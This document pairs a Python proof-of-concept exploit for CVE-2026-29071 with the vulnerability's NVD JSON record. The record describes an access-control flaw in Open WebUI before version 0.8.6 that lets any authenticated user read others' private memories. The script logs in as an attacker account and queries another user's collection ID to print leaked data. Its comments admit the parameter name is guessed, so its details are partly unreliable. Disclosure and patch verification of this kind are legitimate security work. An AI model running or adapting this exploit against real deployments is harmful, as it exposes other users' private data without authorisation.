CVE-2026-29071

import requests # Target configuration target_url = "http://localhost:3000" username = "attacker" password = "attacker_password" # 1. Authenticate to obtain a session token login_payload = { "username": username, "password": password } session = requests.Session() login_resp = session.post(f"{target_url}/api/v1/auths/login", json=login_payload) if login_resp.status_code == 200: print("[+] Login successful") # Assuming session handles cookies, or extract token if needed # 2. Exploit the IDOR vulnerability # The endpoint /api/v1/retrieval/query/collection allows querying memories. # By modifying the collection_id or user_id in the request, # an attacker can read other users' private memories. exploit_url = f"{target_url}/api/v1/retrieval/query/collection" # Attempting to access a target collection (IDOR) # The actual parameter name might vary (e.g., 'id', 'collection_id', 'user_id') exploit_payload = { "collection_id": "victim_user_collection_id" } exploit_resp = session.post(exploit_url, json=exploit_payload) if exploit_resp.status_code == 200: print("[+] Exploit successful! Leaked data:") print(exploit_resp.text) else: print(f"[-] Request failed with status code: {exploit_resp.status_code}") else: print("[-] Login failed")

{"cve": {"id": "CVE-2026-29071", "sourceIdentifier": "[email protected]", "published": "2026-03-27T00:16:22.983", "lastModified": "2026-04-01T16:09:53.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue."}, {"lang": "es", "value": "Open WebUI es una plataforma de inteligencia artificial autoalojada diseñada para operar completamente sin conexión. Antes de la versión 0.8.6, cualquier usuario autenticado puede leer las memorias privadas de otros usuarios a través de '/API/v1/retrieval/query/collection'. La versión 0.8.6 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.6", "matchCriteriaId": "98042D01-E16B-45CE-9BBC-E5A6E2AA2370"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}